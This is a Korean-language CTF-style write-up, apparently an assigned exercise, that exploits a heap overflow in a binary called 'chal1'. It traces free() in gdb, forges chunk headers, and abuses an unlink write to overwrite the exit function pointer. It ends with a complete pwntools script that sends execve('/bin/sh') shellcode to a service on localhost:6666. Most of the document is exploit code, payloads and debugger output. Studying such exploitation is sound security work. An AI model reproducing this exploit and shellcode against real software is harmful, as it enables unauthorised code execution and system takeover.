휘원선배님께서 내주신 과제!!
일단, gbb속에서 확인을 해봅시다
0xbfffe440이 get_my_line의 인자로 들어간다.
memcpy의 인자 0x0804e2c8 0xbfffe440 64
0x804e2c8에 써지기 시작합니다.,, 0x804f148에도 써지기 시작함!!!!
exit: 0x804c8c8(이건 언제나 동일)
위 그림처럼 출력되는 부분을 확인해보자
0 804d008 4de(1246) 1256(1주소-0주소)
1 804d4f0 461(1121) 1128(2주소-1주소)
2 804d958 3b3(947) 952
3 804dd10 2e5(741) 752
4 804e000 2c2(706) 712
5 804e2c8 12c(300) 304
6 804e3f8 2a1(673) 680
7 804e6a0 3ec(1004) 1008
8 804ea90 3b8(952) 960
9 804ee50 2f3(755) 760
저 크기들이 malloc이 이루어지면 박힌다!!
0x804d004에 4e9 1257
0x804d4ec에 469 1129
0x804d954에 3b9 953
0x804dd0c에 2f1 753
0x804dffc에 2c9 713
0x804e2c4에 131 305
0x804e3f4에 2a9 681
0x804e69c에 3f1 1009
0x804ea8c에 3c1 961
0x804ee4c에 2f9 761
0x804f144에 1009 (원래는 1ebd)
0x804e2c8부터 바뀌기 때문에 저 빨간부분들이 문제가 된다.
일단 a를 300개보다 많은 400개를 넣어서 어디가 문제가 되는지 살펴보자.
0x8049344 <free+17>: mov eax,DWORD PTR [ebp+0x8]: eax=0x804e2c8
0x8049347 <free+20>: sub eax,0x4: eax=0x804e2c4
0x804934a <free+23>: mov DWORD PTR [ebp-0xc],eax: 0xbfffe0fc= 0x804e2c4
0x804934d <free+26>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x8049350 <free+29>: mov eax,DWORD PTR [eax]: eax=0x130:0x804e2c4에 적혀있던
0x8049352 <free+31>: and eax,0xfffffffe
0x8049355 <free+34>: mov DWORD PTR [ebp-0x10],eax: 0xbfffe0f8=0x130
0x8049358 <free+37>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x804935b <free+40>: mov eax,DWORD PTR [eax]: eax=0x130
0x804935d <free+42>: and eax,0x1:
0x8049360 <free+45>: test eax,eax
0x8049362 <free+47>: jne 0x80493ad <free+122>
0x8049364 <free+49>: mov eax,DWORD PTR [ebp-0xc] eax=0x804e2c4
0x8049367 <free+52>: sub eax,0x4: eax=0x804e2c0
0x804936a <free+55>: mov eax,DWORD PTR [eax]: eax=0x12c0
0x804936c <free+57>: neg eax: eax=0xffffed40
0x804936e <free+59>: mov edx,eax: edx=0xfffed40
0x8049370 <free+61>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804e2c4
0x8049373 <free+64>: add eax,edx: eax=0x804d004
0x8049375 <free+66>: mov DWORD PTR [ebp-0x14],eax: 0xbfffe0f4=0x804d004
0x8049378 <free+69>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x804937b <free+72>: mov eax,DWORD PTR [eax]: eax=0x12c1
0x804937d <free+74>: and eax,0xfffffffe: eax=0x12c0
0x8049380 <free+77>: add DWORD PTR [ebp-0x10],eax: 0xbfffe0f8=0x12c0+0x130=0x13f0
0x8049383 <free+80>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x8049386 <free+83>: mov eax,DWORD PTR [eax+0x8]: eax=0x804c6c0(0x804d00c에 적혀있던)
0x8049389 <free+86>: mov DWORD PTR [ebp-0x18],eax: 0xbfffe0f0=0x804c6c0
0x804938c <free+89>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004
0x804938f <free+92>: mov eax,DWORD PTR [eax+0x4]: eax=0x804c6c0(804d008에 적혀있던)
0x8049392 <free+95>: mov DWORD PTR [ebp-0x1c],eax: 0xbfffe0ec=0x804c6c0
0x8049395 <free+98>: mov eax,DWORD PTR [ebp-0x1c]: eax=0x804c6c0
0x8049398 <free+101>: mov edx,DWORD PTR [ebp-0x18]: edx=0x804c6c0
0x804939b <free+104>: mov DWORD PTR [eax+0x8],edx: 0x804c6c8=0x804c6c0
0x804939e <free+107>: mov eax,DWORD PTR [ebp-0x18]: eax=0x804c6c0(
0x80493a1 <free+110>: mov edx,DWORD PTR [ebp-0x1c]: edx=0x804c6c0(0xbfffe0ec에 적혀있던)
0x80493a4 <free+113>: mov DWORD PTR [eax+0x4],edx: 0x804c6c4=0x804c6c0
0x80493a7 <free+116>: mov eax,DWORD PTR [ebp-0x14]: eax=0x804d004(0xbfffe0f4에 적혀있던)
0x80493aa <free+119>: mov DWORD PTR [ebp-0xc],eax: 0xbfffe0fc=0x804d004
0x80493ad <free+122>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적혀있던)
0x80493b0 <free+125>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004
0x80493b3 <free+128>: add eax,edx: eax=0x804e3f4(0x804d004+13f0)
0x80493b5 <free+130>: mov DWORD PTR [ebp-0x20],eax: 0xbfffe0e8=0x804e3f4
0x80493b8 <free+133>: mov eax,ds:0x804c084: eax=0x804f54c(0x804c084에 적힌)
0x80493bd <free+138>: cmp eax,DWORD PTR [ebp-
0x80493c0 <free+141>: jne 0x80493f9 <free+198>
0x80493c2 <free+143>: mov eax,DWORD PTR [ebp-0x 20]
0x80493f9 <free+198>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x80493fc <free+201>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004(0xbfffe0fc에 적힌
0x80493ff <free+204>: add eax,edx eax=0x804e3f4(0x804d004+0x13f0)
0x8049401 <free+206>: mov edx,DWORD PTR [ebp-0x10]: edx=0x13f0(0xbfffe0f8에 적힌)
0x8049404 <free+209>: mov ecx,DWORD PTR [ebp-0xc]: ecx=0x804d004(0xbfffe0fc에 적힌)
0x8049407 <free+212>: add edx,ecx edx=0x804e3f4(0x13f0+0x804d004)
0x8049409 <free+214>: mov edx,DWORD PTR [edx]: edx=0x804e3f4에 적힌 AAAA
0x804940b <free+216>: and edx,0xfffffffe: edx=0x61616160
0x804940e <free+219>: mov DWORD PTR [eax],edx: 0x804e3f4=0x61616160
0x8049410 <free+221>: mov eax,DWORD PTR [ebp-0x20]: eax=0x804e3f4(0xbfffe0e8에 적힌)
0x8049413 <free+224>: mov eax,DWORD PTR [eax]: eax= 0x61616160(0x804e3f4에 적힌)
0x8049415 <free+226>: and eax,0xfffffffe eax=0x61616160
0x8049418 <free+229>: mov edx,eax: edx=0x61616160
0x804941a <free+231>: mov eax,DWORD PTR [ebp-0x20]: eax=0x804e3f4(0xbfffe0e8에 적힌)
0x804941d <free+234>: add eax,edx: eax=0x69664554
0x804941f <free+236>: mov eax,DWORD PTR [eax]
0x8049421 <free+238>: and eax,0x1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
원래는0x804e3f4에 0x2a9가 적혀있다.
그래서, eax=0x804e3f4, edx=0x2a8
eax=0x804e69c(0x804e3f4+0x2a8)
0x804941f <free+236>: mov eax,DWORD PTR [eax]: eax=0x3f1(0x804e69c에 적힌)
0x8049421 <free+238>: and eax,0x1: eax=1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
0x8049457 <free+292>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x804945a <free+295>: mov eax,DWORD PTR [eax]: eax=0x12c1(0x804d004에 적힌)
0x804945c <free+297>: and eax,0x1: eax=1
0x804945f <free+300>: or eax,DWORD PTR [ebp-0x10]: (0xbfffe0f8에 적힌 0x13f0)eax=13f1
0x8049462 <free+303>: mov edx,eax: edx=13f1
0x8049464 <free+305>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x8049467 <free+308>: mov DWORD PTR [eax],edx: 0x804d004:13f1
0x8049469 <free+310>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x804946c <free+313>: lea edx,[eax-0x4]: edx=13ec
0x804946f <free+316>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004
0x8049472 <free+319>: add edx,eax: edx=0x804e3f0(0x804d004+0x13ec)
0x8049474 <free+321>: mov eax,DWORD PTR [ebp-0x10]: eax=13f0(0xbfffe0f8에 적힌)
0x8049477 <free+324>: mov DWORD PTR [edx],eax: 0x804e3f0=0x13f0
0x8049479 <free+326>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x804947c <free+329>: shr eax,0x9: eax=0x9
0x804947f <free+332>: test eax,eax
0x8049481 <free+334>: jne 0x804948b <free+344>
0x8049483 <free+336>: mov eax,DWORD PTR [ebp-0x10]
0x8049486 <free+339>: shr eax,0x3
0x8049489 <free+342>: jmp 0x8049502 <free+463>
0x804948b <free+344>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x804948e <free+347>: shr eax,0x9: eax=0x9
0x8049491 <free+350>: cmp eax,0x4
0x8049494 <free+353>: ja 0x80494a1 <free+366>
0x8049496 <free+355>: mov eax,DWORD PTR [ebp-0x10]
0x80494a1 <free+366>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x80494a4 <free+369>: shr eax,0x9: eax=0x9
0x80494a7 <free+372>: cmp eax,0x14
0x80494aa <free+375>: ja 0x80494b7 <free+388>
0x80494ac <free+377>: mov eax,DWORD PTR [ebp-0x10]: eax=0x13f0(0xbfffe0f8에 적힌)
0x80494af <free+380>: shr eax,0x9: eax=0x9
0x80494b2 <free+383>: add eax,0x5b: eax=0x64
0x80494b5 <free+386>: jmp 0x8049502 <free+463>
0x80494b7 <free+388>: mov eax,DWORD PTR [ebp-0x10]
0x8049502 <free+463>: mov DWORD PTR [ebp-0x2c],eax: 0xbfffe0dc=0x64
0x8049505 <free+466>: mov edx,DWORD PTR ds:0x804c080: edx=0x3840000(0x804c080에 적힌)
0x804950b <free+472>: mov eax,DWORD PTR [ebp-0x2c]:eax=0x64(0xbfffe0dc에 적힌)
0x804950e <free+475>: lea ecx,[eax+0x3]: ecx=0x67
0x8049511 <free+478>: test eax,eax
0x8049513 <free+480>: cmovs eax,ecx
0x8049516 <free+483>: sar eax,0x2: eax=0x19
0x8049519 <free+486>: mov ebx,0x1: ebx=0x1
0x804951e <free+491>: mov ecx,eax: ecx=0x19
0x8049520 <free+493>: shl ebx,cl: ebx=0x2000000
0x8049522 <free+495>: mov eax,ebx: eax=0x2000000
0x8049524 <free+497>: or eax,edx: eax=0x3840000
0x8049526 <free+499>: mov ds:0x804c080,eax
0x804952b <free+504>: mov eax,DWORD PTR [ebp-0x2c]: eax=0x804d004(0xbfffe0fc에 적힌) eax=0x64
0x804952e <free+507>: shl eax,0x4: eax=0x640
0x8049531 <free+510>: add eax,0x804c080: eax=0x804c6c0
0x8049536 <free+515>: mov DWORD PTR [ebp-0x30],eax: 0bfffe0d8=0x804c6c0
0x8049539 <free+518>: mov eax,DWORD PTR [ebp-0x30]: eax=0x804c6c0(0xbfffe0d8에 적힌)
0x804953c <free+521>: mov eax,DWORD PTR [eax+0x4]: eax=0x804c6c0(0x804c6c4에 적힌)
0x804953f <free+524>: mov DWORD PTR [ebp-0x34],eax: 0xbfffe0d4=0x804c6c0
0x8049542 <free+527>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004
0x8049545 <free+530>: mov edx,DWORD PTR [ebp-0x30]: edx=0x804c6c0(0xbfffe0d8에 적힌)
0x8049548 <free+533>: mov DWORD PTR [eax+0x8],edx: 0x804d00c=0x804c6c0
0x804954b <free+536>: mov eax,DWORD PTR [ebp-0xc]: eax=0x804d004(0xbfffe0fc에 적힌)
0x804954e <free+539>: mov edx,DWORD PTR [ebp-0x34]: edx=0x804c6c0(0xbfffe0d4에 적힌)
0x8049551 <free+542>: mov DWORD PTR [eax+0x4],edx: 0x804d008=0x804c6c0
0x8049554 <free+545>: mov eax,DWORD PTR [ebp-0x30]: eax=0x804c6c0(0xbfffe0d8에 적힌)
0x8049557 <free+548>: mov edx,DWORD PTR [ebp-0xc]: edx=0x804d004(0xbfffe0fc에 적힌)
0x804955a <free+551>: mov DWORD PTR [eax+0x4],edx:0x804c6c4=0x804d004
0x804955d <free+554>: mov eax,DWORD PTR [ebp-0x30]:eax=0x804c6c0(0xbfffe0d8에 적힌)
0x8049560 <free+557>: mov edx,DWORD PTR [eax+0x4]: edx=0x804d004(0x804c6c4에 적힌)
0x8049563 <free+560>: mov eax,DWORD PTR [ebp-0x34]: eax=0x804c6c0(0xbfffe0d4에 적힌)
0x8049566 <free+563>: mov DWORD PTR [eax+0x8],edx: 0x804c6c8=0x804d004
0x8049569 <free+566>: add esp,0x34
0x804956c <free+569>: pop ebx
0x804956d <free+570>: pop ebp
0x804956e <free+571>: ret
ebp는
0xbfffe108:0xbffff458
즉, free끝나면 0xbffff458로 돌아온다.
free의 ret을 덮어쓰는 건 불가능!!! 여기서 esp는 0xbfffe10c, but 덮어씌워지는 부분은 0xbfffe440
[-------------------------------------code-------------------------------------]
0x8048b1f <main+479>: cmp DWORD PTR [esp+0x133c],0x9
0x8048b27 <main+487>: jbe 0x8048ae9 <main+425>
0x8048b29 <main+489>: mov eax,ds:0x804c8c8
0x8048b2e <main+494>: mov DWORD PTR [esp],0x1
0x8048b35 <main+501>: call eax
0x8048b37 <main+503>: mov eax,0x0
0x8048b3c <main+508>: leave
0x8048b3d <main+509>: ret
main의 ret을 덮을까?를 생각 중,
main+489지점에서 eax=0x804c8c8이 되고,
0x804c8c8이 가리키는 부분이 0x8048910(do_exit)
but,, 0804c000-0804d000 rw-p 00003000 08:01 2359949 /root/Desktop/chal1
즉, 0x804c8c8은 write할 수 있으므로, 쉘코드가 들어있는 부분을 실행해보자.
그런데, 여기까지 내려오려면, 중간에 세폴이 뜨지 않아야 한다.
중간에 세폴이 뜨지 않게, 세폴이 뜨는 이유를 찾아 조절해보자.
즉, 중간에
0x804e3f4에 2a9
0x804e69c에 3f1
0x804ea8c에 3c1
0x804ee4c에 2f9
0x804f144에 1009 (malloc직후에는 1ebd)
일단, 진행이 되어야 하므로,
(python -c 'print
"a"*300+"\xa9\x02\x00\x00"+"a"*676+"\xf1\x03\x00\x00"+"a"*1004+"\xc1\x03\x00\x00"+"a"*956+"\xf9\x02\x00\x00"+"a"*756+"\x09\x10\x00\x00"')|./chal1
이제, 마지막것을 조절해보자 \x09\x10\x00\x00말고 다른 걸 넣어보자
0x804941a <free+231>: mov eax,DWORD PTR [ebp-0x20]
0x804941d <free+234>: add eax,edx
0x804941f <free+236>: mov eax,DWORD PTR [eax]
0x8049421 <free+238>: and eax,0x1
0x8049424 <free+241>: test eax,eax
0x8049426 <free+243>: jne 0x8049457 <free+292>
0x0804941a <+231>: mov eax,DWORD PTR [ebp-0x20]
0x0804941d <+234>: add eax,edx
0x0804941f <+236>: mov eax,DWORD PTR [eax]
0x08049421 <+238>: and eax,0x1
0x08049424 <+241>: test eax,eax
0x08049426 <+243>: jne 0x8049457 <free+292>
0x08049428 <+245>: mov eax,DWORD PTR [ebp-0x20]
0x0804942b <+248>: mov eax,DWORD PTR [eax]
0x0804942d <+250>: and eax,0xfffffffe
0x08049430 <+253>: add DWORD PTR [ebp-0x10],eax
0x08049433 <+256>: mov eax,DWORD PTR [ebp-0x20]
0x08049436 <+259>: mov eax,DWORD PTR [eax+0x8]
0x08049439 <+262>: mov DWORD PTR [ebp-0x24],eax
0x0804943c <+265>: mov eax,DWORD PTR [ebp-0x20]
0x0804943f <+268>: mov eax,DWORD PTR [eax+0x4]
0x08049442 <+271>: mov DWORD PTR [ebp-0x28],eax
0x08049445 <+274>: mov eax,DWORD PTR [ebp-0x28]
0x08049448 <+277>: mov edx,DWORD PTR [ebp-0x24]
0x0804944b <+280>: mov DWORD PTR [eax+0x8],edx
0x0804944e <+283>: mov eax,DWORD PTR [ebp-0x24]
0x08049451 <+286>: mov edx,DWORD PTR [ebp-0x28]
0x08049454 <+289>: mov DWORD PTR [eax+0x4],edx
0x08049457 <+292>: mov eax,DWORD PTR [ebp-0xc]
ebp-0x28에 적히는 걸: A, ebp-0x24에 적히는걸: B라고 하자
파란부분에서 A+8부분에<-B
초록부분에서 B+4부분에<-A
A는 eax+0x4에 적힌거, B는 eax+0x8에 적힌거
A에 쉘코드 박히는 0x804ffd0를 넣고, B에 0x804c8c4를 넣자.
r < <(python -c 'print "a"*300+"\xa9\x02\x00\x00"+"a"*676+"\xf1\x03\x00\x00"+"a"*1004+"\xc1\x03\x00\x00"+"a"*956+"\xf9\x02\x00\x00"+"a"*756+"\x07\x10\x00\x00"+"\xd0\xff\x04\x08"+"\xc4\xc8\x04\x08"+"\xe9\x08\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"')
0x804c8c8에 쉘코드 시작부분이 들어가게 된다.
하지만 쉘코드 부분에 0x804c8c4가 들어가서 망가지게 되므로,
처음에 jmp를 써서 쉘코드 내부에서 저 망가지는 부분을 뛰어넘게 만든다.
jmp \xe9이고, 몇 바이트 뛰어넘을지는 해보면 쉽게 구할 수 있다.
쉘코드에 jmp를 넣는것을 찾는게 참 어려웠다ㅜㅜㅜㅜㅜ
처음에 0x804d008일 때, 0x804ffd0을 넣어줬으니,
처음 leak한 것에 12232를 더한 것을 넣어주면 된다!!
from pwn import*
s=remote('localhost',6666)
s.recvuntil("loc=")
address=s.recv(7)
new_address=hex(int(address,16)+12232)
s.recvuntil("size=300]:")
payload=''
payload+="a"*300
payload+="\xa9\x02\x00\x00"
payload+="a"*676
payload+="\xf1\x03\x00\x00"
payload+="a"*1004
payload+="\xc1\x03\x00\x00"
payload+="a"*956
payload+="\xf9\x02\x00\x00"
payload+="a"*756
payload+="\x07\x10\x00\x00"
payload+=p32(int(new_address,16))
payload+="\xc4\xc8\x04\x08"
payload+="\xe9\x08\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"
payload+="\n"
s.send(payload)
s.interactive()
s.close()
